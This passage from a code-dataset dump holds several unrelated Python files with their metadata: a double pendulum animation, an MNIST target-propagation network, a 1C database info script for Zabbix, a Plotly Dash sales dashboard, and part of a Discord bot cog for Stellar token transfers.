ax.plot(pos1[0,0],pos1[1,0],color='magenta',marker='o',zorder=1)\nm2, = ax.plot(pos2[0,0],pos2[1,0],color='magenta',marker='o',zorder=1)\nr1, = ax.plot(np.linspace(0,pos1[0,0],n),np.linspace(0,pos1[0,0],n)*pos1[1,0]/pos1[0,0],'w',zorder=0)\nm = (pos2[1,0]-pos1[1,0])/(pos2[0,0]-pos1[0,0])\nb = pos1[1,0] - m*pos1[0,0]\nr2, = ax.plot(np.linspace(pos1[0,0],pos2[0,0],n),m*np.linspace(pos1[0,0],pos2[0,0],n)+b,'w',zorder=0)\n\ndef init():\n m1.set_data([],[])\n m2.set_data([],[])\n r1.set_data([],[])\n r2.set_data([],[])\n\ndef animate(t):\n m1.set_data(pos1[0,t],pos1[1,t])\n m2.set_data(pos2[0,t],pos2[1,t])\n r1.set_data(np.linspace(0,pos1[0,t],n),np.linspace(0,pos1[0,t],n)*pos1[1,t]/pos1[0,t])\n m = (pos2[1,t]-pos1[1,t])/(pos2[0,t]-pos1[0,t])\n b = pos1[1,t] - m*pos1[0,t]\n r2.set_data(np.linspace(pos1[0,t],pos2[0,t],n),np.linspace(pos1[0,t],pos2[0,t],n)*m+b)\n\nax.set(xlim=[-1,1],ylim=[-1,0.4],xticks=[],yticks=[],title='double pendulum')\nanim = FuncAnimation(fig,animate,frames=N,init_func=init,interval=1)\nplt.show()", "repo_name": "jonathanhouse/selected-physics-projects", "sub_path": "animations/double_pendulum/ex815.py", "file_name": "ex815.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 23, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 25, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 26, 
"usage_type": "call"}, {"api_name": "math.cos", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 46, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}]}
+{"seq_id": "38218810516", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 26 13:48:49 2018\n\n@author: will\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom mnist import MNIST\n\ndef softmax(x):\n norm = 0\n mx = max(x)\n for i in range(len(x)):\n norm += np.exp(x[i]-mx)\n return np.exp(x-mx)/norm\n\n\ndef deriv_softmax(s):\n return s*(1-s)\n\n\n\ndef base_non_linearity(x):\n if (x>500):\n return x\n return np.log(1+np.exp(x))\n\nnon_linearity = np.vectorize(base_non_linearity)\n\ndef deriv(x):\n return 1/(1+np.exp(-x))\n\ndef gen_one_hot(x):\n out = np.zeros(10)\n out[x] = 1\n return out\n\ndef calc_accuracy(num):\n tot_correct = 0\n for i in tqdm(range(num)):\n hidden_layer = non_linearity(input_to_hidden_weights.dot(test_images[i])).reshape((hidden_layer_size,1))\n output_layer = softmax(hidden_to_output_weights.dot(hidden_layer))\n pred = np.argmax(output_layer)\n if(pred == test_labels[i]):\n tot_correct += 1\n return tot_correct/num\n \n \n \nmndata = MNIST('/home/will/Dropbox/isicni_project/MNIST_data')\nmndata.gz = True\nimages, labels = mndata.load_training()\n\ntest_images, test_labels = mndata.load_testing()\n\n\nimages = np.array(images)\nlabels = np.array(labels)\ntest_images = np.array(test_images)\ntest_labels = np.array(test_labels)\n\nimages = images/255\ntest_images = test_images/255\n\none_hot_labels = []\n\nfor i in range(len(labels)):\n one_hot_labels.append(gen_one_hot(labels[i]))\none_hot_labels = np.array(one_hot_labels)\n\n\nlearning_rate = 0.01\nauto_learning_rate = 0.01\n\ninput_size = 784\nhidden_layer_size = 50\noutput_size = 10\n\nbias_input_to_hidden = np.random.uniform(-1,1,(hidden_layer_size,1))\ninput_to_hidden_weights = np.random.uniform(-1,1,(hidden_layer_size,input_size))\nhidden_to_output_weights = np.random.uniform(-1,1,(output_size,hidden_layer_size))\nbias_hidden_to_output = np.random.uniform(-1,1,(output_size,1))\n\nautoencoder_output_to_hidden = np.random.uniform(-1,1,(hidden_layer_size,output_size))\nbias_autoencoder = np.random.uniform(-1,1,(hidden_layer_size,1))\n\nnum_batches = 1\n\ninv_dist_store = []\n\n#acc = calc_accuracy(len(test_images))\n#print(acc)\n\nfor _ in range(num_batches):\n \n for i in tqdm(range(len(images))):\n idx = np.random.randint(0,len(images))\n target = one_hot_labels[idx].reshape((output_size,1))\n hidden_layer = non_linearity(input_to_hidden_weights.dot(images[idx]).reshape((hidden_layer_size,1))+ bias_input_to_hidden).reshape((hidden_layer_size,1))\n output_layer = softmax(hidden_to_output_weights.dot(hidden_layer) + bias_hidden_to_output)\n db_hidden_out = (output_layer - target).reshape((output_size,1))\n dw_hidden_output = np.dot((output_layer - target),hidden_layer.T)\n \n hidden_to_output_weights += -learning_rate*dw_hidden_output -learning_rate*0.1*hidden_to_output_weights \n bias_hidden_to_output += -learning_rate*db_hidden_out -learning_rate*0.1*bias_hidden_to_output \n \n \n noisy_hidden = (hidden_layer + np.random.normal(0,0.0001,(hidden_layer_size,1))).reshape((hidden_layer_size,1))\n noisy_output = softmax(hidden_to_output_weights.dot(noisy_hidden) + bias_hidden_to_output )\n \n auto_hidden = non_linearity(autoencoder_output_to_hidden.dot(noisy_output)+ bias_autoencoder ).reshape((hidden_layer_size,1))\n \n auto_deriv = deriv(autoencoder_output_to_hidden.dot(noisy_output).reshape((hidden_layer_size,1)) +bias_autoencoder ).reshape((hidden_layer_size,1))\n if(i%5000):\n 
inv_dist_store.append(np.mean(np.abs(non_linearity(autoencoder_output_to_hidden.dot(output_layer)).reshape((hidden_layer_size,1)) - hidden_layer)))\n \n dw_auto = np.dot((auto_hidden - noisy_hidden)*auto_deriv,noisy_output.T) \n dw_auto_bias = (auto_hidden - noisy_hidden)*auto_deriv\n \n autoencoder_output_to_hidden += -auto_learning_rate*dw_auto - auto_learning_rate*0.1*autoencoder_output_to_hidden\n bias_autoencoder += -auto_learning_rate*dw_auto_bias - auto_learning_rate*0.1*bias_autoencoder \n \n target_hidden = hidden_layer + non_linearity(autoencoder_output_to_hidden.dot(target)+bias_autoencoder ) - non_linearity(autoencoder_output_to_hidden.dot(output_layer)+bias_autoencoder )\n \n der = deriv(input_to_hidden_weights.dot(images[idx]).reshape((hidden_layer_size,1)) +bias_input_to_hidden).reshape((hidden_layer_size,1))\n \n dw_input_hidden = np.dot((hidden_layer - target_hidden)*der,(images[idx].reshape(784,1)).T)\n db_input_hidden = (hidden_layer - target_hidden)*der\n \n input_to_hidden_weights += -learning_rate*dw_input_hidden - learning_rate*0.05*input_to_hidden_weights\n bias_input_to_hidden += -learning_rate*db_input_hidden - learning_rate*0.1*bias_input_to_hidden\n acc = calc_accuracy(len(test_images))\n print(acc)\n auto_learning_rate = auto_learning_rate/1.05\n learning_rate = learning_rate/1.05\n\ninv_dist_store = np.array(inv_dist_store)\n", "repo_name": "EntropicEffect/dendritic_backprop", "sub_path": "difference_target_prop.py", "file_name": "difference_target_prop.py", "file_ext": "py", "file_size_in_byte": 5093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.exp", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.vectorize", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 46, "usage_type": "call"}, {"api_name": "mnist.MNIST", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 88, 
"usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "25174855251", "text": "#coding: utf-8\r\nimport onec_dtools #pip install onec_dtools\r\nimport sys\r\nimport json\r\nimport os\r\nif type(sys.argv[1]) == type('str'):\r\n db_path = sys.argv[1]\r\nelse:\r\n db_path = sys.argv[1].decode(sys.getfilesystemencoding())\r\ntry:\r\n with open(db_path, 'rb') as f:\r\n db = onec_dtools.DatabaseReader(f)\r\n version = db.version\r\n tables_q = len(db.tables)\r\n data = []\r\n db_size = os.path.getsize(db_path)\r\n data.append({'{version}': version,\r\n '{tables_q}': tables_q,\r\n '{db_size}': db_size,\r\n })\r\n outtext = (json.dumps(data, ensure_ascii=False)).encode('utf8')\r\n sys.stdout.buffer.write(outtext)\r\nexcept Exception as e:\r\n print('Error')\r\n print(str(type(db_path)))\r\n print(e)\r\n", "repo_name": "orange391224/zabbix-1CD", "sub_path": "src/test1C.py", "file_name": "test1C.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.getfilesystemencoding", "line_number": 9, "usage_type": "call"}, {"api_name": "onec_dtools.DatabaseReader", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stdout.buffer.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "33782163919", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\nimport random\nfrom dash.dependencies import Input, Output\n\necom_sales = pd.read_csv('/usr/local/share/datasets/ecom_sales.csv')\nmajor_categories = list(ecom_sales['Major Category'].unique())\nminor_categories = list(ecom_sales['Minor Category'].unique())\nlogo_link = 'https://assets.datacamp.com/production/repositories/5893/datasets/fdbe0accd2581a0c505dab4b29ebb66cf72a1803/e-comlogo.png'\necom_country = ecom_sales.groupby('Country')['OrderValue'].agg(['sum', 'count']).reset_index().rename(\n columns={'count': 'Sales Volume', 'sum': 'Total Sales ($)'})\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div([\n html.Img(src=logo_link,\n style={'margin': '30px 0px 0px 0px'}),\n html.H1('Sales breakdowns'),\n html.Div(\n children=[\n html.Div(\n children=[\n html.H2('Controls'),\n html.Br(),\n html.H3('Major Category Select'),\n dcc.Dropdown(\n id='major_cat_dd',\n options=[{'label': category, 'value': category} for category in major_categories],\n style={'width': '200px', 'margin': '0 auto'}),\n html.Br(),\n html.H3('Minor Category Select'),\n dcc.Dropdown(\n id='minor_cat_dd',\n style={'width': '200px', 'margin': '0 auto'})\n ],\n style={'width': '350px', 'height': '350px', 'display': 'inline-block',\n 'vertical-align': 'top', 'border': '1px solid black', 'padding': '20px'}),\n html.Div(\n children=[\n dcc.Graph(id='sales_line'),\n html.H3(id='chosen_major_cat_title')\n ],\n style={'width': '700px', 'height': '650px', 'display': 'inline-block'})\n ]), ],\n style={'text-align': 'center', 'display': 'inline-block', 'width': '100%'})\n\n\n# One callback to set minor values & HTML output\n@app.callback(\n Output('minor_cat_dd', 'options'),\n Output('chosen_major_cat_title', 'children'),\n Input('major_cat_dd', 'value'))\ndef update_minor_dd(major_cat_dd):\n major_minor = ecom_sales[['Major Category', 'Minor Category']].drop_duplicates()\n relevant_minor_options = major_minor[major_minor['Major Category'] == major_cat_dd][\n 'Minor Category'].values.tolist()\n minor_options = [{'label': x, 'value': x} for x in relevant_minor_options]\n\n if not major_cat_dd:\n major_cat_dd = 'None Selected'\n # Creating string for title\n major_cat_title = f'This is in the Major Category of : {major_cat_dd}'\n\n # Return the options and title\n return minor_options, major_cat_title\n\n\n# Create a callback to set a default minor category value\n@app.callback(\n Output('minor_cat_dd', 'value'),\n Input('minor_cat_dd', 'options'))\ndef select_minor_cat(options):\n chosen_val = 'None'\n if options:\n vals = [x['value'] for x in options]\n chosen_val = random.choice(vals)\n return chosen_val\n\n\n@app.callback(\n Output('sales_line', 'figure'),\n Input('minor_cat_dd', 'value'))\ndef update_line(minor_cat):\n minor_cat_title = 'All'\n ecom_line = ecom_sales.copy()\n\n if minor_cat:\n minor_cat_title = minor_cat\n ecom_line = ecom_line[ecom_line['Minor Category'] == minor_cat]\n\n ecom_line = ecom_line.groupby('Year-Month')['OrderValue'].agg('sum').reset_index(name='Total Sales ($)')\n line_graph = px.line(ecom_line, x='Year-Month', y='Total Sales ($)',\n title=f'Total Sales by Month for Minor Category: {minor_cat_title}')\n\n return line_graph\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)", "repo_name": "ivan-mihailov/Datacamp_Plotly_Dash", "sub_path": "Chapter_4/ext_chain_callbacks.py", "file_name": "ext_chain_callbacks.py", 
"file_ext": "py", "file_size_in_byte": 3873, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 16, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 18, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 19, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 21, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 22, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 24, "usage_type": "call"}, {"api_name": "dash_html_components.H2", "line_number": 26, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 27, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 28, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 33, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 34, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 35, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 44, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 54, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 55, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 73, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 74, "usage_type": "call"}, {"api_name": "plotly.express.line", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 84, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "74800737689", "text": "from nextcord.ext import commands\nfrom nextcord import User\nimport re\nfrom cogs.utils import monetaryConversions\nfrom utils.customCogChecks import is_public, has_wallet\nfrom cogs.utils.systemMessaages import CustomMessages\n\ncustom_messages = CustomMessages()\nCONST_STELLAR_EMOJI = '<:stelaremoji:684676687425961994>'\nCONST_TX_ERROR_TITLE = \":exclamation: __Transaction Error__ :exclamation: \"\n\n\ndef process_message(message):\n \"\"\"\n Filter message so it is not too long for transaction report\n \"\"\"\n if message:\n if len(message) > 100:\n message = message[:98] + '...'\n else:\n message = 'None'\n\n return message\n\n\nclass TransactionCommands(commands.Cog):\n \"\"\"\n Class handling off-chain discord transactions\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.backoffice = bot.backoffice\n\n def build_stats(self, transaction_data: dict, tx_type: str):\n \"\"\"\n Process data according to the type of transaction\n \"\"\"\n if tx_type == \"public\":\n processed = {\"globalBot\": {\"totalTx\": 1,\n 'totalMoved': transaction_data[\"amount\"],\n \"totalPublicCount\": 1,\n \"totalPublicMoved\": transaction_data[\"amount\"]},\n \"senderStats\": {f\"{transaction_data['ticker']}.publicTxSendCount\": 1,\n f\"{transaction_data['ticker']}.publicSent\": transaction_data[\"amount\"],\n },\n \"recipientStats\": {f\"{transaction_data['ticker']}.publicTxReceivedCount\": 1,\n f\"{transaction_data['ticker']}.publicReceived\": transaction_data[\n \"amount\"],\n },\n \"guildStats\": {\n f'{transaction_data[\"ticker\"]}.publicCount': 1,\n f\"{transaction_data['ticker']}.txCount\": 1,\n f\"{transaction_data['ticker']}.volume\": transaction_data[\"amount\"]\n }\n }\n\n elif tx_type == 'private':\n processed = {\"globalBot\": {\"totalTx\": 1,\n 'totalMoved': transaction_data[\"amount\"],\n \"totalPrivateCount\": 1,\n \"totalPrivateMoved\": transaction_data[\"amount\"]},\n \"senderStats\": {f\"{transaction_data['ticker']}.privateTxSendCount\": 1,\n f\"{transaction_data['ticker']}.privateSent\": transaction_data[\"amount\"],\n },\n \"recipientStats\": {f\"{transaction_data['ticker']}.privateTxReceivedCount\": 1,\n f\"{transaction_data['ticker']}.privateReceived\": transaction_data[\n \"amount\"],\n },\n \"guildStats\": {\n f'{transaction_data[\"ticker\"]}.privateCount': 1,\n f\"{transaction_data['ticker']}.txCount\": 1,\n f\"{transaction_data['ticker']}.volume\": transaction_data[\"amount\"]\n }\n }\n\n return processed\n\n async def update_stats(self, ctx, transaction_data: dict, tx_type: str):\n \"\"\"\n Update all required stats when transaction is executed\n \"\"\"\n processed_stats = self.build_stats(transaction_data=transaction_data, tx_type=tx_type)\n\n # Update stats stats\n await self.backoffice.stats_manager.update_cl_off_chain_stats(ticker=transaction_data[\"ticker\"],\n ticker_stats=processed_stats[\"globalBot\"])\n\n # Updates sender and recipient public transaction stats\n await self.backoffice.stats_manager.update_usr_tx_stats(user_id=ctx.message.author.id,\n tx_stats_data=processed_stats['senderStats'])\n await self.backoffice.stats_manager.update_usr_tx_stats(user_id=transaction_data[\"recipientId\"],\n tx_stats_data=processed_stats[\"recipientStats\"])\n\n await self.backoffice.stats_manager.update_guild_stats(guild_id=ctx.message.guild.id,\n guild_stats_data=processed_stats[\"guildStats\"])\n\n async def stream_transaction(self, ctx, recipient, tx_details: dict, message: str, tx_type: str):\n \"\"\"\n Send reports out to all 
destinations\n \"\"\"\n # Process message\n msg = process_message(message=message)\n # Send to channel where tx has been executed\n native_token = None\n if tx_details['ticker'] == 'xlm':\n native_token = \"stellar\"\n\n if native_token:\n in_dollar = monetaryConversions.convert_to_usd(amount=tx_details[\"amount\"], coin_name='stellar')\n tx_report_msg = f\"{ctx.message.author} just sent {recipient.mention} {tx_details['amount']:.7f}\" \\\n f\" {tx_details['emoji']} (${in_dollar['total']:.4f})\"\n explorer_msg = f'💵 {tx_details[\"amount\"]:.7f} {CONST_STELLAR_EMOJI} (${in_dollar[\"total\"]:.4f}) on ' \\\n f'{ctx.message.guild} channel {ctx.message.channel}'\n total_dollar_value = in_dollar['total']\n conversion_rate = in_dollar[\"usd\"]\n else:\n explorer_msg = f'💵 {tx_details[\"amount\"]} {tx_details[\"assetCode\"].upper()} on ' \\\n f'{ctx.message.guild} channel {ctx.message.channel}'\n tx_report_msg = f\"{ctx.message.author} just sent {recipient.mention} {tx_details['amount']:.7f} \" \\\n f\"{tx_details['assetCode'].upper()}\"\n total_dollar_value = 0\n conversion_rate = 0\n\n if tx_type == 'private':\n explorer_msg = \":detective: \"\n\n await custom_messages.transaction_report_to_channel(ctx=ctx, message=tx_report_msg, tx_type=tx_type)\n\n tx_details[\"conversion\"] = total_dollar_value\n tx_details[\"conversionRate\"] = conversion_rate\n\n # report to sender\n\n await custom_messages.transaction_report_to_user(ctx=ctx, user=recipient, transaction_data=tx_details,\n destination=ctx.message.author,\n direction=0, tx_type=tx_type,\n message=msg)\n\n # report to recipient\n await custom_messages.transaction_report_to_user(ctx=ctx, user=ctx.message.author, transaction_data=tx_details,\n destination=recipient,\n direction=1, tx_type=tx_type,\n message=msg)\n\n # Send out explorer\n\n load_channels = [self.bot.get_channel(int(chn)) for chn in\n self.backoffice.guild_profiles.get_all_explorer_applied_channels()]\n\n await custom_messages.explorer_messages(applied_channels=load_channels, message=explorer_msg)\n\n async def send_impl(self, ctx, amount: float, ticker: str, recipient: User, *, tx_type: str, message: str = None):\n coin = ticker.lower()\n if amount > 0:\n if not ctx.message.author == recipient and not recipient.bot:\n supported = [sup[\"assetCode\"] for sup in self.bot.backoffice.token_manager.get_registered_tokens() if\n sup[\"assetCode\"] == coin]\n if supported or coin == 'xlm':\n coin_data = self.backoffice.token_manager.get_token_details_by_code(coin)\n atomic_value = (int(amount * (10 ** 7)))\n\n # Get user wallet ticker balance\n wallet_value = self.backoffice.wallet_manager.get_ticker_balance(asset_code=coin,\n user_id=ctx.message.author.id)\n\n if wallet_value:\n if wallet_value >= atomic_value:\n # Check if recipient has wallet or not\n if not self.backoffice.account_mng.check_user_existence(user_id=recipient.id):\n self.backoffice.account_mng.register_user(discord_id=recipient.id,\n discord_username=f'{recipient}')\n\n # Update user count in guild system\n await self.backoffice.stats_manager.update_registered_users(\n guild_id=ctx.message.guild.id)\n\n # Increase bridge\n await self.backoffice.stats_manager.create_bridge(user_id=ctx.message.author.id)\n\n # Send up link\n load_channels = [self.bot.get_channel(int(chn)) for chn in\n self.backoffice.guild_profiles.get_all_explorer_applied_channels()]\n current_total = self.backoffice.account_mng.count_registrations()\n\n explorer_msg = f':new: user registered into ***{self.bot.user} System*** ' \\\n f'(Σ 
{current_total})'\n for chn in load_channels:\n if chn is not None:\n await chn.send(content=explorer_msg)\n\n await custom_messages.bridge_notification(ctx, recipient=recipient)\n\n # Deduct balance from sender\n if self.backoffice.wallet_manager.update_coin_balance(coin=coin,\n user_id=ctx.message.author.id,\n amount=int(atomic_value),\n direction=2):\n # Append to recipient\n if self.backoffice.wallet_manager.update_coin_balance(coin=coin, user_id=recipient.id,\n amount=int(atomic_value),\n direction=1):\n\n normal_value = (atomic_value / (10 ** 7))\n\n coin_data[\"amount\"] = normal_value\n coin_data[\"ticker\"] = coin\n\n # Produce dict for streamer\n await self.stream_transaction(ctx=ctx, recipient=recipient, tx_details=coin_data,\n message=message, tx_type=tx_type)\n\n coin_data[\"recipientId\"] = recipient.id\n\n await self.update_stats(ctx=ctx, transaction_data=coin_data, tx_type=tx_type)\n\n else:\n self.backoffice.wallet_manager.update_coin_balance(coin=coin,\n user_id=ctx.message.author.id,\n amount=int(atomic_value),\n direction=1)\n message = f'{amount} {coin.upper()} could not be sent to the {recipient} ' \\\n f'please try again later'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n else:\n message = f'There has been an error while making P2P transaction please try again later'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'You have insufficient balance! Your current wallet balance is' \\\n f' {wallet_value / (10 ** 7)} XLM'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'Your wallet balance of token ***{coin.upper()}*** is 0.0000000. 
Before you can ' \\\n f'make payment you need to first deposit some.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n\n message = f'Coin {coin} has not been integrated yet into {self.bot.user}.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'You are not allowed to send {amount} xlm to either yourself or the bot.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Amount needs to be greater than 0.0000000 XLM'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @commands.group()\n @commands.check(is_public)\n @commands.check(has_wallet)\n @commands.guild_only()\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def send(self, ctx, recipient: User, amount: float, asset_code: str, *, message: str = None):\n if not re.search(\"[~!#$%^&*()_+{}:;\\']\", asset_code.lower()):\n if amount > 0:\n await self.send_impl(ctx, amount, asset_code.lower(), recipient, tx_type=\"public\", message=message)\n else:\n message = f'Amount needs to be greater than 0.0000000 {asset_code.upper()}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Special characters are not allowed in token code'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @commands.group()\n @commands.check(is_public)\n @commands.check(has_wallet)\n @commands.guild_only()\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def private(self, ctx, recipient: User, amount: float, asset_code: str, *, message: str = None):\n if not re.search(\"[~!#$%^&*()_+{}:;\\']\", asset_code.lower()):\n if amount > 0:\n await self.send_impl(ctx, amount, asset_code.lower(), recipient, tx_type=\"private\", message=message)\n else:\n message = f'Amount needs to be greater than 0.0000000 {asset_code.upper()}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Special characters are not allowed in token code'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @send.error\n async def send_error(self, ctx, error):\n if isinstance(error, commands.CheckFailure):\n title = f'__System Transaction Error__'\n message = f'In order to execute P2P transaction you need to be registered into the system, and ' \\\n f'transaction request needs to be executed on one of the text public text channels ' \\\n f'on {ctx.message.guild}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, commands.BadArgument):\n title = 